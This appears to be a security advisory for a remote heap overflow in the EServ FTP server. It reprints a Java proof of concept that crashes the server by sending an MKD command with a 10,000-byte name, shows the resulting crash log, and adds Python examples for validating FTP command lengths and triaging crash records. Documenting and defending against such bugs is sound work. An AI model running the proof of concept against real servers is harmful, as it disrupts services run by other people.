Vulnerability description:
EServ has a remote overflow when it handles long strings in its log. Below is a test program written in Java:
/* Proof of concept code for the heap overflow in EServ <= 2.9.2
 * Written 10/05/2000 by Andrew Lewis aka. Wizdumb [MDMA]
 */
import java.io.*;
import java.net.*;

class eservheap {
    public static void main(String[] args) throws IOException
    {
        if (args.length < 1) {
            System.out.println("Syntax: java eservheap [host] <user> <pass>");
            System.exit(1);
        }
        Socket soq = null;
        PrintWriter white = null;
        BufferedReader weed = null;
        try {
            // connect to the FTP control port of the target host
            soq = new Socket(args[0], 21);
            white = new PrintWriter(soq.getOutputStream(), true);
            weed = new BufferedReader(new InputStreamReader(soq.getInputStream()));
        } catch (Exception e) {
            System.out.println("Problems connecting :-/");
            System.exit(1);
        }
        weed.readLine();                                   // server banner
        // log in with the supplied credentials, or anonymously
        String juzer = (args.length == 3) ? ("USER " + args[1]) : "USER anonymous";
        String pasz  = (args.length == 3) ? ("PASS " + args[2]) : "PASS mdma";
        white.println(juzer + "\n" + pasz);
        weed.readLine();                                   // reply to USER
        weed.readLine();                                   // reply to PASS
        // MKD with a 10000-byte directory name triggers the overflow
        white.print("MKD ");
        for (int i = 0; i < 10000; i++) white.print("A");
        white.println(); // uNf! Who yoh daddy, bitch?
        weed.readLine();
        white.println("QUIT");
    }
}
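From the defender's side, the fix for this class of bug is to bound every command argument before it reaches path handling or the log writer, and to alert on sessions that send oversized ones. The following Python is an added example written for this page; it is not EServ's code and not part of the original post. The 512-byte and 255-byte limits, the 128-byte log truncation width, the client address and the sample session are constructed values; the command set is the RFC 959 pathname commands.

```python
# Policy limits (constructed for this example, not EServ settings).
MAX_ARG_LEN = 512      # longest argument any command may carry
MAX_PATH_LEN = 255     # tighter bound for commands that name a path
MAX_LOGGED_ARG = 128   # longest argument fragment the log writer copies

# RFC 959 commands that take a pathname; the PoC above abuses MKD.
PATH_COMMANDS = {"MKD", "XMKD", "CWD", "XCWD", "RMD", "XRMD", "DELE",
                 "RNFR", "RNTO", "STOR", "RETR", "APPE", "LIST", "NLST"}


def parse_command(line):
    """Split one control-connection line into (VERB, argument).

    Only the trailing CRLF is stripped; anything else in the argument
    is left for validate_command to judge."""
    line = line.rstrip("\r\n")
    verb, _, arg = line.partition(" ")
    return verb.upper(), arg


def validate_command(line, max_arg_len=MAX_ARG_LEN):
    """Return (ok, reason). Runs before the argument is copied anywhere,
    so an oversized MKD name never reaches the path or log code."""
    verb, arg = parse_command(line)
    if not (3 <= len(verb) <= 4 and verb.isalpha()):
        return False, "malformed verb"
    limit = MAX_PATH_LEN if verb in PATH_COMMANDS else max_arg_len
    if len(arg) > limit:
        return False, "%s argument too long (%d > %d)" % (verb, len(arg), limit)
    # embedded CR/LF, NUL or other control bytes are never valid in a name
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in arg):
        return False, "control character in %s argument" % verb
    return True, ""


def safe_log_entry(client, line, max_logged=MAX_LOGGED_ARG):
    """Build a log line whose argument field has a fixed upper width, so
    the logger never copies an attacker-sized string into its buffer."""
    verb, arg = parse_command(line)
    if len(arg) > max_logged:
        arg = arg[:max_logged] + "...[%d bytes truncated]" % len(arg)
    return ("%s %s %s" % (client, verb, arg)).rstrip()


# Constructed control-connection transcript: a normal MKD followed by the
# PoC's 10000-byte one.
SAMPLE_SESSION = [
    "USER anonymous\r\n",
    "PASS mdma\r\n",
    "MKD incoming\r\n",
    "MKD " + "A" * 10000 + "\r\n",
    "QUIT\r\n",
]


def scan_session(lines, max_arg_len=MAX_ARG_LEN):
    """Return (line_number, verb, reason) for every line validate_command
    rejects; a monitoring rule would alert on any non-empty result."""
    findings = []
    for number, raw in enumerate(lines, 1):
        ok, reason = validate_command(raw, max_arg_len)
        if not ok:
            findings.append((number, parse_command(raw)[0], reason))
    return findings


if __name__ == "__main__":
    for finding in scan_session(SAMPLE_SESSION):
        print("line %d: %s rejected: %s" % finding)
    print(safe_log_entry("10.0.0.5", SAMPLE_SESSION[3]))
```

The ordering matters: the length check runs before any per-character work, and the logger is handed a bounded copy rather than the raw argument, which is the property the crashed HOLDS calls in the log below lack.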
The following e.log excerpt shows the result of this overflow:
27.05.2000 17:02:19 Eserv/2.92 2986 1
EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C! REGISTERS:
1C5EC6C 50 62 34 00 36 5D 4E 00 FF 5F 34 00 0C 27 00 00  Pb4.6]N.?_4....
1C5EC7C E8 FD 00 00 41 00 00 00 48 FF C5 01 7E 24 49 00  éü..A...H??.~$I.
1C5EC8C 1B 00 00 00 46 02 01 00 9C EE C5 01 23 00 00 00  .....F..._??.#...
/* Ie. Thread crashes on MKD, but has no effect on other threads */
USER DATA: 346250 HANDLER: 1C5EED0 RETURN STACK:
1C5EE9C : 498BB9 C r>
1C5EEA0 : 4C2AF0 HOLD
1C5EEA4 : 4CAC34 HOLDS
/* these HOLDS are buggy - no length checking */
1C5EEA8 : 7FFFE6FC <not in the image>
1C5EEAC : 7FFFD8F4 <not in the image>
1C5EEB0 : 4CAC49 HOLDS
1C5EEB4 : 4E5E12 MKD
1C5EEB8 : 49B279 |DROP
1C5EEBC : 2 <not found>
1C5EEC0 : 339DE8 <not found>
1C5EEC4 : 270C <not found>
1C5EEC8 : 4C42C1 INTERPRET
1C5EECC : 4C303F NEW_CATCH
1C5EED0 : 1C5EF14 <not in the image>
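To triage a record like the one above, an analyst wants the exception code, the faulting address and word, and the chain of resolved return-stack symbols without reading the dump by hand. The following Python parser is an added example, not part of the advisory or of EServ; it assumes only the line layout visible above (a CODE:/ADDRESS:/WORD: header, a RETURN STACK: marker, then "slot : value symbol" lines, with <not in the image> or <not found> for unresolved values) and the embedded record is the page's own crash log minus the three register memory-dump lines, which the parser does not need.

```python
import re

# The e.log record from this page, without the memory-dump lines.
CRASH_RECORD = """\
27.05.2000 17:02:19 Eserv/2.92 2986 1
EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C! REGISTERS:
/* Ie. Thread crashes on MKD, but has no effect on other threads */
USER DATA: 346250 HANDLER: 1C5EED0 RETURN STACK:
1C5EE9C : 498BB9 C r>
1C5EEA0 : 4C2AF0 HOLD
1C5EEA4 : 4CAC34 HOLDS
/* these HOLDS are buggy - no length checking */
1C5EEA8 : 7FFFE6FC <not in the image>
1C5EEAC : 7FFFD8F4 <not in the image>
1C5EEB0 : 4CAC49 HOLDS
1C5EEB4 : 4E5E12 MKD
1C5EEB8 : 49B279 |DROP
1C5EEBC : 2 <not found>
1C5EEC0 : 339DE8 <not found>
1C5EEC4 : 270C <not found>
1C5EEC8 : 4C42C1 INTERPRET
1C5EECC : 4C303F NEW_CATCH
1C5EED0 : 1C5EF14 <not in the image>
"""

# Layout assumed from the record above; other EServ versions may differ.
HEADER_RE = re.compile(r"EXCEPTION! CODE:([0-9A-F]+) ADDRESS:([0-9A-F]+) WORD:(\S+)")
HANDLER_RE = re.compile(r"HANDLER: ([0-9A-F]+)")
FRAME_RE = re.compile(r"^([0-9A-F]+) : ([0-9A-F]+) (.+)$")

# NTSTATUS value that EServ prints for an access violation.
STATUS_ACCESS_VIOLATION = "C0000005"


def parse_crash_record(text):
    """Turn one EXCEPTION! record into a dict: code, address, word, handler
    and the return-stack frames in the order printed (innermost first).
    Lines that are /* annotations */ are skipped."""
    rec = {"code": None, "address": None, "word": None,
           "handler": None, "frames": []}
    in_stack = False
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("/*"):
            continue
        m = HEADER_RE.search(line)
        if m:
            rec["code"], rec["address"], rec["word"] = m.groups()
            continue
        if "RETURN STACK:" in line:
            h = HANDLER_RE.search(line)
            rec["handler"] = h.group(1) if h else None
            in_stack = True
            continue
        m = FRAME_RE.match(line) if in_stack else None
        if m:
            slot, value, symbol = m.groups()
            rec["frames"].append({
                "slot": slot,
                "value": int(value, 16),
                "symbol": symbol,
                # values the loader could not map to a word are bracketed
                "resolved": not symbol.startswith("<"),
            })
    return rec


def call_chain(rec):
    """Symbols of the resolved frames, innermost first, which is the
    path the faulting thread took into the crashing word."""
    return [f["symbol"] for f in rec["frames"] if f["resolved"]]


def is_access_violation(rec):
    return rec["code"] == STATUS_ACCESS_VIOLATION


def triage(rec):
    """One-line summary an analyst can paste into a ticket."""
    kind = "access violation" if is_access_violation(rec) else "code " + str(rec["code"])
    return "%s in %s at %s via %s" % (
        kind, rec["word"], rec["address"], " <- ".join(call_chain(rec)))


if __name__ == "__main__":
    print(triage(parse_crash_record(CRASH_RECORD)))
```

Reading the chain innermost-first (C r>, HOLD, HOLDS, HOLDS, MKD, ...) is what lets the annotation "these HOLDS are buggy" be checked against the record rather than taken on trust: the fault in C! is reached from MKD through the string-building words, and the two unresolved 7FFF... slots between them sit outside the executable image.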